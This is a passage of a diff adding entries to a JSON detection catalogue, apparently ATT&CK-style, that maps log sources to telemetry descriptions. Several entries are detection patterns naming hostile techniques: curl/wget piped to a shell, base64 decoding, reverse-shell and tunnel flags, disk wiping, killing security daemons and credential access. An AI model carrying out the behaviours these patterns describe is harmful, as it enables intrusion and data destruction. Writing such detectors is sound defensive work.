+                            "channel": "Execution of osascript, bash, or Terminal initiated from Mail.app or Safari"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of /bin/sh,/bin/bash,/usr/bin/curl,/usr/bin/python by service accounts (e.g., apache, mysql, nobody) immediately after inbound network activity."
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "parent_name in ('sshd','httpd','screensharingd') spawning shells or scripting runtimes."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process activity stream"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "SYSCALL record where exe contains passwd/userdel/chage and auid != root"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Post-login execution of unrecognized child process from launchd or loginwindow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of base64|openssl|xxd|python|perl with arguments matching Base64 flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process command line contains base64, -enc, openssl enc -base64"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: arguments contain Base64-like strings"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "commands containing base64, openssl enc -base64, xxd -p"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of process launched via loginwindow session restore"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: exec + filewrite: ~/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "/var/log/containers/*.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Java apps or other processes with hidden window attributes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process Execution"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve on code or jetbrains-gateway with remote flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: code or jetbrains-gateway launching with --tunnel or --remote"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'processImagePath CONTAINS \"curl\" OR \"osascript\"'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd, shred, wipe targeting block devices"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of sleep or ping command within script interpreted by bash/python"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or socket/connect system calls from processes using crypto libraries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process using AES/RC4 routines unexpectedly"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "execution of known firewall binaries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "type=EXECVE or SYSCALL for /bin/date, /usr/bin/timedatectl, /sbin/hwclock, /bin/cat /etc/timezone, /bin/cat /proc/uptime"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "execve: command like 'date', 'timedatectl', 'hwclock', 'cat /etc/timezone'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process exec events of systemsetup, date, ioreg with command_line parameters indicating time discovery"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: binary == \"/usr/sbin/systemsetup\" and args contains \"-gettimezone\""
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: command LIKE '%systemsetup -gettimezone%' OR '%date%'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of osascript, curl, or unexpected automation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec /usr/bin/pwpolicy"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket(AF_PACKET|AF_INET, SOCK_RAW, *), setsockopt(\u2026 SO_ATTACH_FILTER|SO_ATTACH_BPF \u2026), bpf(cmd=BPF_PROG_LOAD), open/openat path=\"/dev/bpf*\" (BSD/macOS-like) or setcap cap_net_raw."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "KERN messages about eBPF program load/verify or LSM denials related to bpf."
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "open/openat of /dev/bpf*; ioctl BIOCSETF-like operations."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Exec of tcpdump, rvictl, custom tools linked to libpcap.A.dylib; sysextd/systemextensionsctl events for NetworkExtension content filters."
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "/usr/sbin/postfix, /usr/sbin/exim, /usr/sbin/sendmail"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of known flash tools (e.g., flashrom, fwupd)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.firmwareupdater activity or update-firmware binary invoked"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of system tools like dmidecode, lspci, lscpu, dmesg, systemd-detect-virt"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or spawn of 'system_profiler', 'ioreg', 'kextstat', 'sysctl', or calls to sysctl API"
+                        },
+                        {
+                            "name": "macos:endpointSecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Suspicious binaries or scripts interacting with authentication binaries (sshd, gdm, login)"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: Processes unexpectedly invoking Keychain or authentication APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: execve calls where a browser/webview process is parent and child is interpreter (python, sh, ruby) or downloader (curl, wget)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_create: Process creation where parent is Safari/Google Chrome and child is script interpreter or signed-but-unusual helper binary"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:launch"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Shell commands invoked by SQL process such as postgres, mysqld, or mariadbd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of smbclient, smbmap, rpcclient, nmblookup, crackmapexec smb"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: Process execution of \"sharing -l\", \"smbutil view\", \"mount_smbfs\""
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of scp, rsync, curl with remote destination"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "logMessage contains pbpaste or osascript"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call with argv matching known disk enumeration commands (lsblk, parted, fdisk)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process launch of diskutil or system_profiler with SPStorageDataType"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "execution of esxcli with args matching 'storage', 'filesystem', 'core device list'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail.app executing with parameters updating rules state"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/vmkernel.log, /var/log/vmkwarning.log"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: Exec of ffmpeg, avfoundation-based binaries, or custom signed apps accessing camera"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "exec into pod followed by secret retrieval via API"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_name IN (\"VBoxManage\", \"prlctl\") AND command CONTAINS (\"list\", \"show\")"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec srm|exec openssl|exec gpg"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process execution with LD_PRELOAD or modified library path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of process with DYLD_INSERT_LIBRARIES set"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "process creation events linked to container namespaces executing host-level binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process and signing chain events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchservices events for misleading extensions"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Execution of disguised binaries"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process listening or connecting on non-standard ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd services binding to non-standard ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, connect"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "process or cron activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binaries with unsigned or anomalously signed certificates"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve logging for /usr/bin/systemctl and systemd-run"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Invocation of osascript or dylib injection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of files saved in mail or download directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Terminal, osascript, or other interpreters originating from Mail or Preview"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process events"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unauthorized sudo or shell access, especially leading to file changes in /var/www or /srv/http"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of unexpected terminal or web scripts modifying /Library/WebServer/Documents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of CLI tools like psql, mysql, mongo, sqlite3"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process start of Java or native DB client tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loginwindow or tccd-related entries"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: process_events, launchd, and tcc.db access"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "process execution or network connect from just-created container PID namespace"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of pip, npm, gem, or similar package managers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line invocation of pip3, brew install, npm install from interactive Terminal"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "fork/exec of service via PID 1 (systemd)"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of ssh/scp/sftp without corresponding authentication log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of ssh or sftp without corresponding login event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: execve where exe=/usr/bin/python3 or similar interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of remote desktop app or helper binary"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected processes making network calls based on DNS-derived ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl spawning new processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl activity and process creation"
+                        },
+                        {
+                            "name": "containerd:events",
+                            "channel": "New container with suspicious image name or high resource usage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Python, Swift, or other binaries invoking archiving libraries"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Processes linked with libssl or crypto libraries making outbound connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process invoking SSL routines from Security framework"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of binaries located in /etc/init.d/ or systemd service paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binary listed in newly modified LaunchAgent plist"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of bless or nvram modifying boot parameters"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected processes registered with launchd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process launch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, osascript, or unexpected Office processes"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Trust validation failures or bypass attempts during notarization and code signing checks"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "spawned shell or execution environment activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_exec: image in {/bin/bash,/bin/zsh,/usr/bin/osascript,/usr/bin/python*,/usr/bin/curl,/usr/bin/ssh,/usr/bin/open} AND parent in {Preview, TextEdit, Microsoft Word, Microsoft Excel, AdobeReader, Archive Utility, Finder}"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: exe in {/bin/bash,/bin/sh,/usr/bin/python*,/usr/bin/perl,/usr/bin/php,/usr/bin/node,/usr/bin/curl,/usr/bin/wget,/usr/bin/xdg-open,/usr/bin/ssh,/usr/bin/rundll32 (wine)} AND ppid process is a document viewer/browser"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd/sgdisk with arguments writing to sector 0 or partition table"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of zip, ditto, hdiutil, or openssl by processes not normally associated with archiving"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for chmod, chown, chflags with unusual parameters or targets"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "AdvancedHunting(DeviceEvents, ProcessCreate, ImageLoad, AMSI/ETW derived signals)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execve or dylib load from memory without backing file"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands that alter firewall or start listeners: iptables|nft|ufw|firewall-cmd|pfctl|systemctl start sshd/telnet/dropbear; raw-socket/libpcap tools (tcpdump, tshark, nmap --raw)."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of pfctl, socketfilterfw, launchctl start ssh/telnet, libpcap consumers."
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Shell Execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unusual child process tree indicating attempted recovery after crash"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of binaries/scripts presenting false health messages for security daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of processes mimicking Apple Security & Privacy GUIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, setifflags"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events where path like '%tcpdump%'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd, shred, or wipe with arguments targeting block devices"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "systemctl stop auditd, kill -9 <pid>, or modifications to /etc/selinux/config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, git, or Office processes with network connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - process subsystem"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls for qemu-system*, kvm, or VBoxHeadless"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution for VBoxHeadless, prl_vm_app, vmware-vmx"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process logs"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of interpreters (python, perl), custom binaries, or shell utilities with long arguments containing non-standard tokens"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: arguments contain long, non-standard tokens / custom alphabets"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command line or log output shows non-standard encoding routines"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "commands containing long non-standard tokens or custom lookup tables"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/sbin/installer spawning child process from within /private/tmp or package contents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of dpkg or rpm followed by fork/execve from within postinst, prerm, etc."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execve: Helper tools invoked through XPC executing unexpected binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of modified binary without valid signature"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: exe in (/usr/bin/bash,/usr/bin/sh,/usr/bin/zsh,/usr/bin/python*) AND cmdline matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64\\s*-d|python\\s*-c'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: ParentImage in (Terminal, iTerm2) AND Image in (/bin/zsh,/bin/bash,/usr/bin/python*) AND CommandLine matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64 -D|python -c'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process created with repeated ICMP or UDP flood behavior"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "binary execution of security_authtrampoline"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: exec"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Child processes of Safari, Chrome, or Firefox executing scripting interpreters"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of older or non-standard interpreters"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process execution events for permission modification utilities with command-line analysis"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for chmod, chown, chflags with parameter analysis and target path examination"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process execution monitoring for permission modification utilities with command-line argument analysis"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Invocation of packet generation tools (e.g., hping3, nping) or fork bombs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Execution of flooding tools or compiled packet generators"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve for proxy tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process, socket, and DNS logs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events table"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line containing `trap` or `echo 'trap` written to login shell files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log collect --predicate"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or nanosleep with no stdout/stderr I/O"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd or osascript spawns process with delay command"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "systemd-udevd spawning user-defined action from RUN+="
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:spawn"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'eventMessage contains \"exec\"'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "cat|less|grep accessing .bash_history from a non-shell process"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Process execution via .desktop Exec path from /etc/xdg/autostart or ~/.config/autostart"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of dpkg, rpm, or other package manager with list flag"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of system_profiler or osascript invoking enumeration"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "apache2 or nginx spawning sh, bash, or python interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "httpd spawning bash, zsh, python, or osascript"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/libexec/security_authtrampoline or child processes originating from non-trusted binaries triggering credential prompts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security or osascript"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd spawning processes tied to new or modified LaunchDaemon .plist entries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of ping, nping, or crafted network packets via bash or python to reflection services"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of commands modifying iptables/nftables to block selective IPs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System process modifications altering DNS/proxy settings"
+                        },
+                        {
+                            "name": "containerd:Events",
+                            "channel": "unusual process spawned from container image context"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "curl, python scripts, rsync with internal share URLs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: spawn, exec"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Rapid spawning of resource-heavy applications (e.g., Preview, Safari, Office)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation events where command line = pmset with arguments affecting sleep, hibernatemode, displaysleep"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected apps performing repeated DNS lookups"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchservices or loginwindow events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with LD_PRELOAD or linker-related environment variables set"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of process with DYLD_INSERT_LIBRARIES set"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious Swift/Objective-C or scripting processes writing archive-like outputs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of re-parented process"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Anomalous parent PID change"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation with parent PID of 1 (launchd)"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "child process invoking dynamic linker post-ptrace"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Processes executing kextload, spctl, or modifying kernel extension directories"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Unsigned or ad-hoc signed process executions in user contexts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of diskutil or hdiutil attaching hidden partitions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for discovery utilities (system_profiler, sw_vers, dscl, networksetup) with command-line parameter analysis"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process event monitoring with focus on discovery utilities and cryptographic framework usage correlation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected apps generating frequent DNS queries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket: Suspicious creation of AF_UNIX sockets outside expected daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Non-standard processes invoking financial applications or payment APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Agent/headless flags (listen/connect/reverse/tunnel) or remote-control binaries spawning shells"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "systemctl enable/start: Creation/enablement of custom .service units in /etc/systemd/system"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process exec of remote-control apps or binaries with headless/connect flags"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process activity, exec events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream process subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:exec and kext load events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --info --predicate 'eventMessage CONTAINS \"exec\"'"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-DotNETRuntime",
+                            "channel": "Unexpected AppDomain creation events or anomalous AppDomainManager assembly load behavior"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of network stress tools or anomalies in socket/syscall behavior"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unsigned binary execution following SIP change"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands altering firewall or enabling listeners (iptables, nft, ufw, firewall-cmd, systemctl start *ssh*/*telnet*, ip route add, tcpdump, tshark)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of /sbin/pfctl, /usr/libexec/ApplicationFirewall/socketfilterfw, ifconfig, tcpdump, npcap/libpcap consumers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of zip, ditto, hdiutil, or openssl by non-terminal parent processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binaries with TCC protected access under unexpected parent processes such as Finder.app, SystemUIServer, or nsurlsessiond"
+                        },
+                        {
+                            "name": "WinEventLog:AppLocker",
+                            "channel": "EventCode=8003, 8004"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, unlink"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd, processes"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "socat, ssh, or nc processes opening unexpected ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution of ssh with -L/-R forwarding flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd or cron spawning mining binaries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or socket/connect system calls for processes using RSA handshake"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process invoking SecKeyCreateRandomKey or asymmetric crypto APIs"
+                        },
+                        {
+                            "name": "azure:vmguest",
+                            "channel": "Unexpected execution of cloud agent processes (e.g., WindowsAzureGuestAgent.exe, ssm-agent) followed by arbitrary script or binary execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Script interpreter invoked by nginx/apache worker process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of Office binaries with network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of bash/zsh/python/osascript targeting key file locations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of /sbin/emond with child processes launched"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "provider: ETW CreateProcess events linking msbuild.exe to suspicious children where standard logs are incomplete"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "shutdown -h now or reboot"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Code.app, idea, JetBrainsToolbox, eclipse with install/extension flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for system discovery utilities (system_profiler, sysctl, networksetup, ioreg) with parameter analysis"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for process execution and system call monitoring during reconnaissance"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "host daemon events related to VM operations and configuration queries during reconnaissance"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMware kernel events for hardware and system configuration access during environmental validation"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "processes modifying environment variables related to history logging"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: parent process is usb/hid device handler, child process bash/python invoked"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, rclone, or Office apps invoking network sessions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of kextstat, kextfind, or ioreg targeting driver information"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation involving binaries interacting with resource fork data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of suspicious exploit binaries targeting security daemons"
+                        },
+                        {
